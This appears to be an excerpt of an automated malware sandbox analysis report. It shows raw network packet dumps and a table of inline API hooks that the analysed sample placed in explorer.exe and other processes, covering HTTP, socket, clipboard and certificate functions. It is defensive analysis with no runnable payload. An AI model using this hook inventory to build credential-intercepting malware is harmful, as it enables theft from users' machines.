Aug 8, 2014 11:26:07.477905035 MESZ801032213.186.33.87192.168.1.13Data Raw: 49 1d 0a 7f 93 0a 0a e6 22 97 68 0a 99 b6 92 bc f6 bc 0a 2b 4a 0a 0a 84 0a 2a 0a 0a 0a 0a be c7 86 42 e9 e0 0a 02 cf 24 02 b8 5c fe d0 0a 0a 28 0a 0a 0a 0a 0a 46 0a 0a 0a 0a a2 0a 0a 0a 0a 97 50 0a 32 92 0a 10 b1 1a 0a 78 49 6a 0a 0a 0a c1 71 8b
Data Ascii: I"h+J*B$\(FP2xIjqbBbNE;hET!Cv:r07j$+J:QdGo8pH
329
Aug 8, 2014 11:26:07.478038073 MESZ801032213.186.33.87192.168.1.13Data Raw: 5a 6a 0a 32 0a 72 0a 0a a3 0a 0a 0a 7c 6c 8d 0a b1 60 64 8f 0a 0a 0a 67 0c 41 ee 8e 4c 0a 48 1f 0a 0a 0a ba 0a 0a 0a 0a 0a 0a 0a 0a 0a 5a 0a 40 0a 48 0a b0 eb 0a 0a 21 0a 0a 39 0a 0a 0a 95 c0 20 c5 0a 0a 09 0a e9 f9 0a b1 2e 17 d0 0a cf 0a 0a 40
Data Ascii: Zj2r|l`dgALHZ@H!9 .@d!7'!gWBpd5="Dr"/45(SDA$|
331
Aug 8, 2014 11:26:07.478041887 MESZ801032213.186.33.87192.168.1.13Data Raw: 0a 0a 0a 0a 6a 0a 0a 70 0a 0a 0a 0a 00 da 0a 61 0a cc a1 67 0a 5a df bb 05 e3 e5 fd 77 26 14 f6 0a c7 24 5c 0a 0a 0a 2e 0a 0a 96 0a e8 0a 0b e1 99 0a 0a 82 54 32 f5 58 bc f7 fc 0a 0a 0a 6f 0a a0 93 0a 6b 0a 69 5a 0a 0a 0a c8 0a f1 3b c3 0a e8 0a
Data Ascii: jpagZw&$\.T2XokiZ;8G6w=1400GKBfu b0fX|&&@@)Co^HQ",!\
332
Aug 8, 2014 11:26:07.478044033 MESZ801032213.186.33.87192.168.1.13Data Raw: db e3 fc f2 cc ae 87 fa a6 58 92 ed 20 4d 21 12 09 de 0a 15 23 2e c9 5d 43 a2 43 e6 07 8d 1c a8 78 38 c1 3d 9b af d4 d3 03 f1 17 20 ac d2 f1 3e f5 a9 d1 d6 00 7e a9 f4 e9 1d f3 47 1a ab 27 5c 30 ca c7 99 18 14 98 1c 41 02 29 7b 39 5d ba 9b f6 45
Data Ascii: X M!#.]CCx8= >~G'\0A){9]EfZ &{~}Q7F0>cnP(xX>G*WiEXj32+m>ISH*M\@<hZ#*d{2+iN'+%D3{K9Y|xI
334
Aug 8, 2014 11:26:07.478056908 MESZ801032213.186.33.87192.168.1.13Data Raw: fa 5c ed 1a 87 72 6e 2a 48 82 10 ac 87 32 20 14 4f 0c 4a 68 15 83 12 37 83 3a d2 fd 62 2c bb af 6e 9b e3 4c 0d 98 14 ac 93 75 ed 10 c1 f8 e4 ac d3 5e ab 52 10 11 dc 23 40 7a 5d 2b 53 cb dc 81 76 87 8c 68 2e 7c bf 11 73 e9 01 2b 42 dc 91 72 16 82
Data Ascii: \rn*H2 OJh7:b,nLu^R#@z]+Svh.|s+Br1u#$lMpO{Q5\IR6cg%]d@b^BXY.yCa3=JkjH9bsIbF`kvV ^G$gfqzw4K][Ve
335
Aug 8, 2014 11:26:07.478173971 MESZ801032213.186.33.87192.168.1.13Data Raw: b0 4f e2 33 d3 48 fb cf b2 9e a0 cc 44 9a df d0 95 4c 41 52 c4 d7 aa 4a 7f 53 33 a5 10 26 c8 e0 a8 5a 27 95 bf 15 40 2b 2e c2 06 4c 9d 8f a1 b4 cf 8e c1 1f 04 56 c2 e7 d5 73 c3 f7 e6 2a 68 79 4e cf a2 fe 3b 73 a8 89 e4 b0 47 43 0d 56 45 e8 32 d0
Data Ascii: O3HDLARJS3&Z'@+.LVs*hyN;sGCVE2vV,Cs64Mo$}Af?_<rL_u_Uf+~v$0fzB-z6yNF3/8s0M>fpw({HX7UX`vKw9H=J&l:)$$BN
337
Aug 8, 2014 11:26:07.478240013 MESZ801032213.186.33.87192.168.1.13Data Raw: 6f d5 cf f0 bb d2 a9 00 0e 8b 91 e9 fd 9d 43 a2 74 cf c0 6c 8f 95 f9 42 ed d6 88 f6 fa 78 c9 12 7a 60 d3 c1 5a b9 e0 60 2a 0e 2a 0a 60 9f 4a 20 73 12 b9 6b 1b 18 58 9d 93 54 71 c3 07 23 21 e2 24 3f 96 a5 66 7b 8b ac 14 12 ff 90 4d cd 6f af 53 21
Data Ascii: oCtlBxz`Z`**`J skXTq#!$?f{MoS!h-(L=F'IU)<v,I=BbWQ"whK!\VjrM4r6 pp PHd8nU&e.U6*FA y)F/*
338
Aug 8, 2014 11:26:07.478244066 MESZ801032213.186.33.87192.168.1.13Data Raw: da 99 85 f7 1f 89 da 8e 54 3b 3d 70 a5 12 4b a8 ed 26 a2 e1 f1 9b 65 8b e9 0a cf b5 72 05 f4 43 e4 cb 06 96 6c 24 eb 2d 4b 83 04 44 03 d7 c5 71 6c b2 e7 8a 65 7d ff 7c c5 82 7d 70 85 9e 27 be 68 ee 07 6f a1 6f 5d 78 6f 28 b2 b1 f7 05 c7 72 77 eb
Data Ascii: T;=pK&erCl$-KDqle}|}p'hoo]xo(rw@~noq;L4pj-f8>qtgu^VFYJix)|XbB7\r`}J={ddIaH@PpE{hfr+4Gyx s,:d|2w
340
Aug 8, 2014 11:26:07.478256941 MESZ801032213.186.33.87192.168.1.13Data Raw: 38 de c4 c4 54 ce 6e a5 0d 41 8a 6b 26 db b7 ed d3 22 02 32 bb f3 d5 65 ed 06 5c eb 67 fd 90 d0 d0 db c5 dc 7e af ea 00 37 86 f4 2e 96 dd d1 29 27 35 21 03 fb 33 6f 23 95 5b 60 30 5f 05 de 78 5d 04 c0 b9 77 e0 81 e6 02 81 b1 6c 69 75 62 e1 95 32
Data Ascii: 8TnAk&"2e\g~7.)'5!3o#[`0_x]wliub2\&\K{h00=1vb`\XVS6#oz%#Z.OKMs"rRRw:M\4S9/IHGb^GB|fS]Z.HZZ=a
341
Aug 8, 2014 11:26:07.478339911 MESZ801032213.186.33.87192.168.1.13Data Raw: b7 c6 b7 d9 ed 69 f0 3a 3d 04 8a c9 f6 02 b1 b1 cf a9 e9 51 a8 16 58 3c 7d 08 df c3 af 9b c4 8e e3 28 cb 90 38 5a 30 a1 c7 1c 37 0d 73 19 b8 23 ab 79 36 3e bc 76 c3 37 d4 6a d8 40 d2 4e ae ca e2 3b 8c 6f 23 fd d9 b9 22 f2 49 7c be ab 0f 2b b1 cc
Data Ascii: i:=QX<}(8Z07s#y6>v7j@N;o#"I|+#7#<R#Dt5z0Y$i_D~(jO0L%p7BC?2NP^?MB]?^l^Dx)MJ9<W[$E;fv1}DfZV
342
Aug 8, 2014 11:26:07.478446960 MESZ801032213.186.33.87192.168.1.13Data Raw: 64 c4 4b 4b 12 a2 35 01 4c 02 61 b8 99 21 93 b0 de 92 7b 21 69 c2 43 79 d7 9a fd af 9f 5c 9e ed 3b 5c bd b3 4f 6d 40 e4 18 69 c6 26 6c 06 c3 f5 54 90 a9 28 18 8e e8 67 7d 04 b8 a2 5e 0f 62 34 79 36 0a 31 d7 42 9c aa 93 61 77 4f 94 65 1c 4b 74 76
Data Ascii: dKK5La!{!iCy\;\Om@i&lT(g}^b4y61BawOeKtvENv|A8p|(/a1a2dsZ_{H=Z7X70hO%SxE<HhQBd7gpUPG\jC"#& +HxG]9os8;]3
343
Aug 8, 2014 11:26:07.478450060 MESZ801032213.186.33.87192.168.1.13Data Raw: 10 bd 41 ec eb 9b b6 11 28 40 48 3a ed 4d 2e b6 31 ef c7 5d be fb 49 56 fe 23 bd 3f 72 8c 40 de 39 e5 d0 03 c0 ac 2a 6d c1 8b d9 df 08 b2 52 01 b4 6d 4b 43 46 5d b2 1d 2b 90 7a 1d 05 d7 2b 48 2f 4a 60 a9 c0 0d 37 49 40 2e cc a0 ff b2 97 30 e5 55
Data Ascii: A(@H:M.1]IV#?r@9*mRmKCF]+z+H/J`7I@.0U0e@%EDMp.{:%ANJ^ %/w{*l+OIp711Py 6`"y;B>c&~w]g=M%Jj_%~quLR_
345
Aug 8, 2014 11:26:07.478463888 MESZ801032213.186.33.87192.168.1.13Data Raw: 8f b5 0c ce 9f 8f ac 44 bd 73 44 80 e4 09 a0 ae c7 01 21 22 4d 6f 27 d8 87 1f 3c cc 8d 41 38 26 8b 93 ad 72 bf ac 87 b0 05 99 9b 0a 85 fc 73 04 a3 aa cb b0 ac dd ef 19 13 10 32 bf 7b 65 aa 15 33 ab 67 09 a3 7e c4 a3 b8 1e 13 fb 5e b9 aa 82 cf 9f
Data Ascii: DsD!"Mo'<A8&rs2{e3g~^%l~-.|D~WZwgF"T'dG1rvfxp}+ jq|*f\3jQ%':['9z=&.F?sj3pQrNF@/cOa|(Bi
346
Aug 8, 2014 11:26:07.478466034 MESZ801032213.186.33.87192.168.1.13Data Raw: 7f 7f 43 18 e5 b9 69 52 42 92 a1 2c d8 a2 3a d3 80 f9 f2 95 74 4f c2 64 73 93 63 b7 55 1e ff 7f 5b fb 37 8c 73 18 cb 2b 9f 11 f1 3b ea e1 74 39 ba 6b 63 46 ef 92 d0 9a 0d 20 a9 10 9c 5b 01 de 8c 16 2c 79 4d ec 32 ab 8b 7f ea 67 40 78 0d 98 f5 c2
Data Ascii: CiRB,:tOdscU[7s+;t9kcF [,yM2g@xocay`Zs[s`~_mRh7,zE<|QJcDK)S=QFH)E]f>_LwLj<cvl|@KM03x$vEYH:m
348
Aug 8, 2014 11:26:07.478562117 MESZ801032213.186.33.87192.168.1.13Data Raw: 1c a0 04 9c ef d2 c5 c0 e8 57 ea 8f 0b 1f bc 4d ec dc d0 fa 26 25 08 26 41 ea f1 5a 22 2c 81 0f fe ea c3 d6 57 d9 d0 93 29 74 0c 4e 23 98 e5 67 64 5e 05 86 d5 73 ac 59 df e6 f0 50 1a 3d ec 66 60 97 d9 59 c6 20 df ec a7 99 8d 8e 87 90 63 83 27 d6
Data Ascii: WM&%&AZ",W)tN#gd^sYP=f`Y c'A(iXD m(C,Ce5jorC)A
348

Hooks - Code Manipulation Behavior

User Modules

Hook Summary

Function Name | Hook Type | Active in Processes
GetUpdateRect | INLINE | explorer.exe, reader_sl.exe, ctfmon.exe
CallWindowProcA | INLINE | explorer.exe, reader_sl.exe, ctfmon.exe
CallWindowProcW | INLINE | explorer.exe, reader_sl.exe, ctfmon.exe
EndPaint | INLINE | explorer.exe, reader_sl.exe, ctfmon.exe
GetUpdateRgn | INLINE | explorer.exe, reader_sl.exe, ctfmon.exe
GetDCEx | INLINE | explorer.exe, reader_sl.exe, ctfmon.exe
GetCapture | INLINE | explorer.exe, reader_sl.exe, ctfmon.exe
DefWindowProcW | INLINE | explorer.exe, reader_sl.exe, ctfmon.exe
GetMessageA | INLINE | explorer.exe, reader_sl.exe, ctfmon.exe
GetMessageW | INLINE | explorer.exe, reader_sl.exe, ctfmon.exe
DefDlgProcA | INLINE | explorer.exe, reader_sl.exe, ctfmon.exe
GetDC | INLINE | explorer.exe, reader_sl.exe, ctfmon.exe
DefDlgProcW | INLINE | explorer.exe, reader_sl.exe, ctfmon.exe
DefWindowProcA | INLINE | explorer.exe, reader_sl.exe, ctfmon.exe
GetClipboardData | INLINE | explorer.exe, reader_sl.exe, ctfmon.exe
OpenInputDesktop | INLINE | explorer.exe, reader_sl.exe, ctfmon.exe
PeekMessageA | INLINE | explorer.exe, reader_sl.exe, ctfmon.exe
PeekMessageW | INLINE | explorer.exe, reader_sl.exe, ctfmon.exe
RegisterClassW | INLINE | explorer.exe, reader_sl.exe, ctfmon.exe
RegisterClassA | INLINE | explorer.exe, reader_sl.exe, ctfmon.exe
GetWindowDC | INLINE | explorer.exe, reader_sl.exe, ctfmon.exe
ReleaseDC | INLINE | explorer.exe, reader_sl.exe, ctfmon.exe
SetCapture | INLINE | explorer.exe, reader_sl.exe, ctfmon.exe
DefMDIChildProcA | INLINE | explorer.exe, reader_sl.exe, ctfmon.exe
DefMDIChildProcW | INLINE | explorer.exe, reader_sl.exe, ctfmon.exe
DefFrameProcA | INLINE | explorer.exe, reader_sl.exe, ctfmon.exe
DefFrameProcW | INLINE | explorer.exe, reader_sl.exe, ctfmon.exe
RegisterClassExW | INLINE | explorer.exe, reader_sl.exe, ctfmon.exe
TranslateMessage | INLINE | explorer.exe, reader_sl.exe, ctfmon.exe
BeginPaint | INLINE | explorer.exe, reader_sl.exe, ctfmon.exe
RegisterClassExA | INLINE | explorer.exe, reader_sl.exe, ctfmon.exe
GetCursorPos | INLINE | explorer.exe, reader_sl.exe, ctfmon.exe
GetMessagePos | INLINE | explorer.exe, reader_sl.exe, ctfmon.exe
SwitchDesktop | INLINE | explorer.exe, reader_sl.exe, ctfmon.exe
SetCursorPos | INLINE | explorer.exe, reader_sl.exe, ctfmon.exe
ReleaseCapture | INLINE | explorer.exe, reader_sl.exe, ctfmon.exe
GetFileAttributesExW | INLINE | explorer.exe, reader_sl.exe, ctfmon.exe
ZwCreateThread | INLINE | explorer.exe, reader_sl.exe, ctfmon.exe
NtCreateThread | INLINE | explorer.exe, reader_sl.exe, ctfmon.exe
InternetReadFile | INLINE | explorer.exe
HttpSendRequestA | INLINE | explorer.exe
HttpSendRequestW | INLINE | explorer.exe
InternetQueryDataAvailable | INLINE | explorer.exe
InternetReadFileExA | INLINE | explorer.exe
HttpSendRequestExA | INLINE | explorer.exe
HttpQueryInfoA | INLINE | explorer.exe
HttpSendRequestExW | INLINE | explorer.exe
InternetCloseHandle | INLINE | explorer.exe
closesocket | INLINE | explorer.exe
send | INLINE | explorer.exe
WSASend | INLINE | explorer.exe
PFXImportCertStore | INLINE | explorer.exe
ZwClose | INLINE | wscntfy.exe
NtClose | INLINE | wscntfy.exe

Processes

Process: explorer.exe, Module: USER32.dll
Function Name | Hook Type | New Data
GetUpdateRect | INLINE | 0xE9 0x90 0x0A 0xAA 0xA0 0x0A
CallWindowProcA | INLINE | 0xE9 0x9D 0xDA 0xA1 0x19 0x9A
CallWindowProcW | INLINE | 0xE9 0x9F 0xF0 0x02 0x22 0x2A
EndPaint | INLINE | 0xE9 0x97 0x7D 0xDB 0xB7 0x7A
GetUpdateRgn | INLINE | 0xE9 0x97 0x71 0x15 0x53 0x3A
GetDCEx | INLINE | 0xE9 0x92 0x25 0x58 0x82 0x2A
GetCapture | INLINE | 0xE9 0x94 0x41 0x13 0x3C 0xCA
DefWindowProcW | INLINE | 0xE9 0x9B 0xB8 0x83 0x33 0x3A
GetMessageA | INLINE | 0xE9 0x9B 0xB7 0x75 0x5A 0xAA
GetMessageW | INLINE | 0xE9 0x9F 0xF4 0x43 0x3F 0xFA
DefDlgProcA | INLINE | 0xE9 0x93 0x33 0x3D 0xDC 0xCA
GetDC | INLINE | 0xE9 0x94 0x4E 0xEC 0xC1 0x1A
DefDlgProcW | INLINE | 0xE9 0x92 0x2A 0xA8 0x84 0x4A
DefWindowProcA | INLINE | 0xE9 0x9A 0xA0 0x0F 0xFF 0xFA
GetClipboardData | INLINE | 0xE9 0x92 0x23 0x37 0x79 0x9A
OpenInputDesktop | INLINE | 0xE9 0x9C 0xCA 0xAD 0xD3 0x3A
PeekMessageA | INLINE | 0xE9 0x9F 0xF5 0x52 0x2E 0xEA
PeekMessageW | INLINE | 0xE9 0x96 0x6F 0xF3 0x3F 0xFA
RegisterClassW | INLINE | 0xE9 0x94 0x42 0x22 0x20 0x0A
RegisterClassA | INLINE | 0xE9 0x9C 0xCF 0xFD 0xD9 0x9A
GetWindowDC | INLINE | 0xE9 0x93 0x33 0x3B 0xB8 0x8A
ReleaseDC | INLINE | 0xE9 0x9F 0xF6 0x6C 0xC1 0x1A
SetCapture | INLINE | 0xE9 0x91 0x13 0x30 0x0D 0xDA
DefMDIChildProcA | INLINE | 0xE9 0x91 0x14 0x4C 0xC9 0x9A
DefMDIChildProcW | INLINE | 0xE9 0x93 0x3B 0xBB 0xB8 0x8A
DefFrameProcA | INLINE | 0xE9 0x9D 0xD4 0x4C 0xC8 0x8A
DefFrameProcW | INLINE | 0xE9 0x9B 0xBD 0xDB 0xB9 0x9A
RegisterClassExW | INLINE | 0xE9 0x9F 0xFF 0xF1 0x14 0x4A
TranslateMessage | INLINE | 0xE9 0x97 0x7A 0xAF 0xF9 0x9A
BeginPaint | INLINE | 0xE9 0x92 0x24 0x4B 0xB7 0x7A
RegisterClassExA | INLINE | 0xE9 0x99 0x9A 0xA4 0x48 0x8A
GetCursorPos | INLINE | 0xE9 0x99 0x9F 0xF3 0x38 0x8A
GetMessagePos | INLINE | 0xE9 0x94 0x4F 0xF3 0x36 0x6A
SwitchDesktop | INLINE | 0xE9 0x94 0x4C 0xCC 0xC2 0x2A
SetCursorPos | INLINE | 0xE9 0x98 0x81 0x16 0x6E 0xEA
ReleaseCapture | INLINE | 0xE9 0x95 0x51 0x10 0x0D 0xDA

Process: explorer.exe, Module: kernel32.dll
Function Name | Hook Type | New Data
GetFileAttributesExW | INLINE | 0xE9 0x97 0x71 0x15 0x57 0x76

Process: explorer.exe, Module: ntdll.dll
Function Name | Hook Type | New Data
ZwCreateThread | INLINE | 0xE9 0x9C 0xC7 0x79 0x94 0x45
NtCreateThread | INLINE | 0xE9 0x9C 0xC7 0x79 0x94 0x45

Process: explorer.exe, Module: WININET.dll
Function Name | Hook Type | New Data
InternetReadFile | INLINE | 0xE9 0x97 0x78 0x8F 0xFE 0xEC
HttpSendRequestA | INLINE | 0xE9 0x90 0x0C 0xC1 0x1F 0xFC
HttpSendRequestW | INLINE | 0xE9 0x99 0x9D 0xD5 0x50 0x0C
InternetQueryDataAvailable | INLINE | 0xE9 0x9F 0xF4 0x4F 0xF7 0x7C
InternetReadFileExA | INLINE | 0xE9 0x9A 0xA1 0x1F 0xF0 0x0C
HttpSendRequestExA | INLINE | 0xE9 0x9D 0xDA 0xA5 0x50 0x0C
HttpQueryInfoA | INLINE | 0xE9 0x95 0x55 0x50 0x08 0x8C
HttpSendRequestExW | INLINE | 0xE9 0x94 0x40 0x09 0x96 0x6C
InternetCloseHandle | INLINE | 0xE9 0x9A 0xA9 0x93 0x33 0x3C

Process: explorer.exe, Module: WS2_32.dll
Function Name | Hook Type | New Data
closesocket | INLINE | 0xE9 0x93 0x37 0x7C 0xCB 0xB3
send | INLINE | 0xE9 0x97 0x73 0x3B 0xBD 0xD3
WSASend | INLINE | 0xE9 0x9C 0xC1 0x1A 0xA0 0x03

Process: explorer.exe, Module: CRYPT32.dll
Function Name | Hook Type | New Data
PFXImportCertStore | INLINE | 0xE9 0x99 0x98 0x80 0x0C 0xC3
Process: reader_sl.exe, Module: kernel32.dll
Function NameHook TypeNew Data
GetFileAttributesExWINLINE0xE9 0x97 0x71 0x15 0x57 0x72
Process: reader_sl.exe, Module: USER32.dll
Function Name         Hook Type  New Data
GetUpdateRect         INLINE     0xE9 0x90 0x0A 0xAA 0xA0 0x05
CallWindowProcA       INLINE     0xE9 0x9D 0xDA 0xA1 0x19 0x95
CallWindowProcW       INLINE     0xE9 0x9F 0xF0 0x02 0x22 0x25
EndPaint              INLINE     0xE9 0x97 0x7D 0xDB 0xB7 0x75
GetUpdateRgn          INLINE     0xE9 0x97 0x71 0x15 0x53 0x35
GetDCEx               INLINE     0xE9 0x92 0x25 0x58 0x82 0x25
GetCapture            INLINE     0xE9 0x94 0x41 0x13 0x3C 0xC6
DefWindowProcW        INLINE     0xE9 0x9B 0xB8 0x83 0x33 0x35
GetMessageA           INLINE     0xE9 0x9B 0xB7 0x75 0x5A 0xA5
GetMessageW           INLINE     0xE9 0x9F 0xF4 0x43 0x3F 0xF6
DefDlgProcA           INLINE     0xE9 0x93 0x33 0x3D 0xDC 0xC5
GetDC                 INLINE     0xE9 0x94 0x4E 0xEC 0xC1 0x15
DefDlgProcW           INLINE     0xE9 0x92 0x2A 0xA8 0x84 0x45
DefWindowProcA        INLINE     0xE9 0x9A 0xA0 0x0F 0xFF 0xF5
GetClipboardData      INLINE     0xE9 0x92 0x23 0x37 0x79 0x95
OpenInputDesktop      INLINE     0xE9 0x9C 0xCA 0xAD 0xD3 0x35
PeekMessageA          INLINE     0xE9 0x9F 0xF5 0x52 0x2E 0xE5
PeekMessageW          INLINE     0xE9 0x96 0x6F 0xF3 0x3F 0xF6
RegisterClassW        INLINE     0xE9 0x94 0x42 0x22 0x20 0x06
RegisterClassA        INLINE     0xE9 0x9C 0xCF 0xFD 0xD9 0x95
GetWindowDC           INLINE     0xE9 0x93 0x33 0x3B 0xB8 0x85
ReleaseDC             INLINE     0xE9 0x9F 0xF6 0x6C 0xC1 0x15
SetCapture            INLINE     0xE9 0x91 0x13 0x30 0x0D 0xD5
DefMDIChildProcA      INLINE     0xE9 0x91 0x14 0x4C 0xC9 0x95
DefMDIChildProcW      INLINE     0xE9 0x93 0x3B 0xBB 0xB8 0x85
DefFrameProcA         INLINE     0xE9 0x9D 0xD4 0x4C 0xC8 0x85
DefFrameProcW         INLINE     0xE9 0x9B 0xBD 0xDB 0xB9 0x95
RegisterClassExW      INLINE     0xE9 0x9F 0xFF 0xF1 0x14 0x46
TranslateMessage      INLINE     0xE9 0x97 0x7A 0xAF 0xF9 0x95
BeginPaint            INLINE     0xE9 0x92 0x24 0x4B 0xB7 0x75
RegisterClassExA      INLINE     0xE9 0x99 0x9A 0xA4 0x48 0x85
GetCursorPos          INLINE     0xE9 0x99 0x9F 0xF3 0x38 0x85
GetMessagePos         INLINE     0xE9 0x94 0x4F 0xF3 0x36 0x65
SwitchDesktop         INLINE     0xE9 0x94 0x4C 0xCC 0xC2 0x25
SetCursorPos          INLINE     0xE9 0x98 0x81 0x16 0x6E 0xE5
ReleaseCapture        INLINE     0xE9 0x95 0x51 0x10 0x0D 0xD5
Process: reader_sl.exe, Module: ntdll.dll
Function Name         Hook Type  New Data
ZwCreateThread        INLINE     0xE9 0x9C 0xC7 0x79 0x94 0x41
NtCreateThread        INLINE     0xE9 0x9C 0xC7 0x79 0x94 0x41
Process: wscntfy.exe, Module: ntdll.dll
Function Name         Hook Type  New Data
ZwClose               INLINE     0x68 0x8B 0xBA 0xA8 0x89 0x9A
NtClose               INLINE     0x68 0x8B 0xBA 0xA8 0x89 0x9A
Process: ctfmon.exe, Module: USER32.dll
Function Name         Hook Type  New Data
GetUpdateRect         INLINE     0xE9 0x90 0x0A 0xAA 0xA0 0x06
CallWindowProcA       INLINE     0xE9 0x9D 0xDA 0xA1 0x19 0x96
CallWindowProcW       INLINE     0xE9 0x9F 0xF0 0x02 0x22 0x26
EndPaint              INLINE     0xE9 0x97 0x7D 0xDB 0xB7 0x76
GetUpdateRgn          INLINE     0xE9 0x97 0x71 0x15 0x53 0x36
GetDCEx               INLINE     0xE9 0x92 0x25 0x58 0x82 0x26
GetCapture            INLINE     0xE9 0x94 0x41 0x13 0x3C 0xC6
DefWindowProcW        INLINE     0xE9 0x9B 0xB8 0x83 0x33 0x36
GetMessageA           INLINE     0xE9 0x9B 0xB7 0x75 0x5A 0xA6
GetMessageW           INLINE     0xE9 0x9F 0xF4 0x43 0x3F 0xF6
DefDlgProcA           INLINE     0xE9 0x93 0x33 0x3D 0xDC 0xC6
GetDC                 INLINE     0xE9 0x94 0x4E 0xEC 0xC1 0x16
DefDlgProcW           INLINE     0xE9 0x92 0x2A 0xA8 0x84 0x46
DefWindowProcA        INLINE     0xE9 0x9A 0xA0 0x0F 0xFF 0xF6
GetClipboardData      INLINE     0xE9 0x92 0x23 0x37 0x79 0x96
OpenInputDesktop      INLINE     0xE9 0x9C 0xCA 0xAD 0xD3 0x36
PeekMessageA          INLINE     0xE9 0x9F 0xF5 0x52 0x2E 0xE6
PeekMessageW          INLINE     0xE9 0x96 0x6F 0xF3 0x3F 0xF6
RegisterClassW        INLINE     0xE9 0x94 0x42 0x22 0x20 0x06
RegisterClassA        INLINE     0xE9 0x9C 0xCF 0xFD 0xD9 0x96
GetWindowDC           INLINE     0xE9 0x93 0x33 0x3B 0xB8 0x86
ReleaseDC             INLINE     0xE9 0x9F 0xF6 0x6C 0xC1 0x16
SetCapture            INLINE     0xE9 0x91 0x13 0x30 0x0D 0xD6
DefMDIChildProcA      INLINE     0xE9 0x91 0x14 0x4C 0xC9 0x96
DefMDIChildProcW      INLINE     0xE9 0x93 0x3B 0xBB 0xB8 0x86
DefFrameProcA         INLINE     0xE9 0x9D 0xD4 0x4C 0xC8 0x86
DefFrameProcW         INLINE     0xE9 0x9B 0xBD 0xDB 0xB9 0x96
RegisterClassExW      INLINE     0xE9 0x9F 0xFF 0xF1 0x14 0x46
TranslateMessage      INLINE     0xE9 0x97 0x7A 0xAF 0xF9 0x96
BeginPaint            INLINE     0xE9 0x92 0x24 0x4B 0xB7 0x76
RegisterClassExA      INLINE     0xE9 0x99 0x9A 0xA4 0x48 0x86
GetCursorPos          INLINE     0xE9 0x99 0x9F 0xF3 0x38 0x86
GetMessagePos         INLINE     0xE9 0x94 0x4F 0xF3 0x36 0x66
SwitchDesktop         INLINE     0xE9 0x94 0x4C 0xCC 0xC2 0x26
SetCursorPos          INLINE     0xE9 0x98 0x81 0x16 0x6E 0xE6
ReleaseCapture        INLINE     0xE9 0x95 0x51 0x10 0x0D 0xD6
Process: ctfmon.exe, Module: kernel32.dll
Function Name         Hook Type  New Data
GetFileAttributesExW  INLINE     0xE9 0x97 0x71 0x15 0x57 0x72
Process: ctfmon.exe, Module: ntdll.dll
Function Name         Hook Type  New Data
ZwCreateThread        INLINE     0xE9 0x9C 0xC7 0x79 0x94 0x41
NtCreateThread        INLINE     0xE9 0x9C 0xC7 0x79 0x94 0x41

System Behavior